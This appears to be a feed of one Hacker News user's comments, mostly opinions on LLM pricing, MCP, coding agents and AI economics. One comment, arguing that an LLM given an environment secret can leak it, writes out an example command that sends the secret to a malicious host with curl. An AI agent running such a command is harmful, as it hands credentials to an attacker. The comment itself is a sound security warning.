Hacker News: crazylogger

What we learned building sandbox for document agents

crazylogger — Tue, 19 May 2026 12:48:04 +0000

Article URL: https://blog.yfzhou.fyi/posts/doc-sandbox/

Comments URL: https://news.ycombinator.com/item?id=48192600

Points: 1

# Comments: 0

New comment by crazylogger in "GPT-5.5 Price Increase: What It Costs"

crazylogger — Fri, 08 May 2026 15:21:58 +0000

OpenRouter may see you fire hundreds of requests at them, but they have no idea that "these 50 requests here at 4PM are for task A", "those 100 requests there does task B", etc. So it's a shallow analysis at the "overall request shape" level.

New comment by crazylogger in "Ask HN: We just had an actual UUID v4 collision..."

crazylogger — Fri, 08 May 2026 15:04:49 +0000

For a single database using UUIDs, yes, it's astronomically rare. But it's quite a different thing to say that no computer system on Earth has ever experienced a UUID collision. The number of systems out there is also astronomical.

New comment by crazylogger in "Microsoft and OpenAI end their exclusive and revenue-sharing deal"

crazylogger — Tue, 28 Apr 2026 02:21:16 +0000

People had this "why you probably can't run a GPT-4 (or even GPT-3.5) class model on your MBP anytime soon" conversation before.

Today's LLMs are able pack much more capabilities into fewer parameters compared to 2023. We might still be at the very rudimentary phase of this technology there are low-hanging efficiency gains to be had left and right. These models consume many orders of magnitude more energy than a human brain, this all seems like room for improvement.

The right question: is there a law in information theory that fundamentally prevents a 70B model of any architecture from being as smart as Opus 4.7?

New comment by crazylogger in "Amateur armed with ChatGPT solves an Erdős problem"

crazylogger — Sun, 26 Apr 2026 06:18:25 +0000

"Hi ChatGPT, propose and prove something radically new in the genre of Gödel's theorem."

How is this not just another proposed problem (albeit with a search space much larger than an Erdos problem's)?

New comment by crazylogger in "DeepSeek v4"

crazylogger — Fri, 24 Apr 2026 07:29:34 +0000

I haven't seen anyone claiming that API prices are subsidized.

At some point (from the very beginning till ~2025Q4) Claude Code's usage limit was so generous that you can get roughly $10~20 (API-price-equivalent) worth of usage out of a $20/mo Pro plan each day (2 * 5h window) - and for good reason, because LLM agentic coding is extremely token-heavy, people simply wouldn't return to Claude Code for the second time if provided usage wasn't generous or every prompt costs you $1. And then Codex started trying to poach Claude Code users by offering even greater limits and constantly resetting everyone's limit in recent months. The API price would have to be 30x operating cost to make this not a subsidy. That would be an extraordinary claim.

New comment by crazylogger in "DeepSeek v4"

crazylogger — Fri, 24 Apr 2026 06:15:24 +0000

Training data == source code, training algorithm == compiler, model weights == compiled binary.

New comment by crazylogger in "Sam Altman may control our future – can he be trusted?"

crazylogger — Tue, 07 Apr 2026 01:42:04 +0000

If all they do is "just" brute-force problem solving, then they are already bound to take over R&D & other knowledge work and exponentially accelerate progress, i.e. the SciFi "singularity" BS ends up happening all the same. Whether we classify them as true reasoning is just semantics.

New comment by crazylogger in "Claude Code's source code has been leaked via a map file in their NPM registry"

crazylogger — Tue, 31 Mar 2026 14:18:39 +0000

Why would this be in the client code though?

New comment by crazylogger in "Improving Composer through real-time RL"

crazylogger — Sat, 28 Mar 2026 02:30:21 +0000

This feels so wrong. the LLM should play the role of a very general (but empty & un-opinionated) brain - you don’t want to perform a coding-specific lobotomy on someone every day. The proper target of their RL should have been their harness. That’s what determines the agent's trajectory as much as the base model.

I also wonder since they’re doing constant RL on model weights with today's Cursor design, does that mean they can never change their system prompt & other parts of the harness?

1) Comparison between past trajectories data would be meaningless if they were operating under different instructions.

2) Performance will be terrible the next time they change their tool design, since the model is now "opinionated" based on how a previous version of Cursor was designed.

Anthropic is more sensible with their “constitution” approach to safety. The behaviors (and ultimately the values) you want your model to follow should be a document, not a lobotomy.

New comment by crazylogger in "When does MCP make sense vs CLI?"

crazylogger — Mon, 02 Mar 2026 05:54:59 +0000

MCP solves a very specific problem: how do you ship a LLM’s tool/function so that it is callable by an LLM in an inter-process manner (so that you don’t need to modify OpenAI’s code to make your tool available in ChatGPT)? CLIs concern what happens inside such tools, namely a `bash` tool. As you can see they are different layers of the same stack.

> LLMs don’t need a special protocol ... LLMs are really good at using command-line tools.

The author's point only makes sense if LLMs all have a computer built-in - they don't. LLMs will only have a commandline if it is provided with commandline tools, and MCP is the standard way to provide tools.

If I have to find an analogy for this (nonsensical) MCP vs. CLI framing, it's like someone saying “ditch the browser, use html instead” - what is that supposed to mean?

New comment by crazylogger in "Making MCP cheaper via CLI"

crazylogger — Thu, 26 Feb 2026 10:38:24 +0000

Setting an env var on a machine the LLM has control over is giving it the secret. When LLM tries `echo $SECRET` or `curl https://malicious.com/api -h secret:$SECRET` (or any one of infinitely many exfiltration methods possible), how do you plan on telling these apart from normal computer use?

Prior art: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/

New comment by crazylogger in "Making MCP cheaper via CLI"

crazylogger — Thu, 26 Feb 2026 04:09:50 +0000

Then you inevitably have to leak your API secret to the LLM in order for it to successfully call the APIs.

MCP is a thin toolcall auth layer that has to be there so that ChatGPT and claude.ai can "connect to your Slack", etc.

New comment by crazylogger in "A16z partner says that the theory that we’ll vibe code everything is wrong"

crazylogger — Sun, 22 Feb 2026 01:46:26 +0000

Money is useful mostly for hiring human labor to outcompete others, e.g. Satya Nadella has 100K employees under his command, you don't, so you can't realistically compete with MS today - this is their main moat.

If AI renders human labor a cheap commodity (say you can orchestrate a bunch of agents to develop + market a Windows competitor for $1000 of compute), what used to be "Satya + his army vs. you" now becomes mostly a 1:1 fair fight, which favors the startup.

New comment by crazylogger in "Code is cheap. Show me the talk"

crazylogger — Fri, 30 Jan 2026 16:19:53 +0000

You are describing tradition (deterministic?) automation before AI. With AI systems as general as today's SOTA LLMs, they'll happily take on the job regardless of the task falling into class I or class II.

Ask a robot arm "how should we improve our car design this year", it'll certainly get stuck. Ask an AI, it'll give you a real opinion that's at least on par with a human's opinion. If a company builds enough tooling to complete the "AI comes up with idea -> AI designs prototype -> AI robot physically builds the car -> AI robot test drives the car -> AI evaluates all prototypes and confirms next year's design" feedback loop, then theoretically this definitely can work.

This is why AI is seen as such a big deal - it's fundamentally different from all previous technologies. To an AI, there is no line that would distinguish class I from II.

New comment by crazylogger in "TimeCapsuleLLM: LLM trained only on data from 1800-1875"

crazylogger — Tue, 13 Jan 2026 05:25:07 +0000

Or maybe, LLMs are pioneering scientific advancements - people are using LLMs to read papers, choose what problems to work on, come up with experiments, analyze results, and draft papers, etc., at this very moment. Except they eventually stick their human names on the cover so we almost never know.

New comment by crazylogger in "Claude Code CLI was broken"

crazylogger — Fri, 09 Jan 2026 03:11:00 +0000

Proper vibe coding should involves tons of vibe refactoring.

I'd say spending at least a quarter of my vibe coding time on refactoring + documentation refresh to ensure the codebase looking impeccable is the only way my projects can work at all long term. We don't want to confuse the coding agent.

New comment by crazylogger in "GPT-5.2-Codex"

crazylogger — Fri, 19 Dec 2025 07:18:59 +0000

From a couple hours of usage in the CLI, 5.2-codex seems to burn through my plan's limit noticeably faster than 5.1-codex. So I guess the usage limit is a set dollar amount of API credits under the hood.

New comment by crazylogger in "Structured outputs on the Claude Developer Platform"

crazylogger — Sat, 15 Nov 2025 12:05:15 +0000

The way you get structured output with Claude prior to this is via tool use.

IMO this was the more elegant design if you think about it: tool calling is really just structured output and structured output is tool calling. The "do not provide multiple ways of doing the same thing" philosophy.

New comment by crazylogger in "GPT-5-Codex-Mini – A more compact and cost-efficient version of GPT-5-Codex"

crazylogger — Sun, 09 Nov 2025 06:51:54 +0000

This is just personal experience + reddit anecdotes. I've been using CC from day one (when API pricing was the only way to pay for CC), then I've been on the $20 Pro plan and am getting a solid $5+ worth of usage in each 5h session, times 5-10 sessions per week (so an overall 5-10x subsidy over one month.) And I extrapolated that $200 subscribers must be getting roughly 10x Pro's usage. I do feel the actual limit fluctuates each week as Claude Code engage in this new subsidy war with OAI Codex though.

My theory is this:

- we know from benchmarks that open-weight models like Deepseek R1 and Kimi K2's capabilities are not far behind SOTA GPT/Claude

- open-weight API pricing (e.g. on openrouter) is roughly 1/10~1/5 that of GPT/Claude

- users can more or less choose to hook their agent CLI/IDEs to either closed or open models

If these points are true, then the only reason people are primarily on CC & Codex plans is because they are subsidized by at least 5~10x. When confronted with true costs, users will quickly switch to the lowest inference cost vendor, and we get perfect competition + zero margin for all vendors.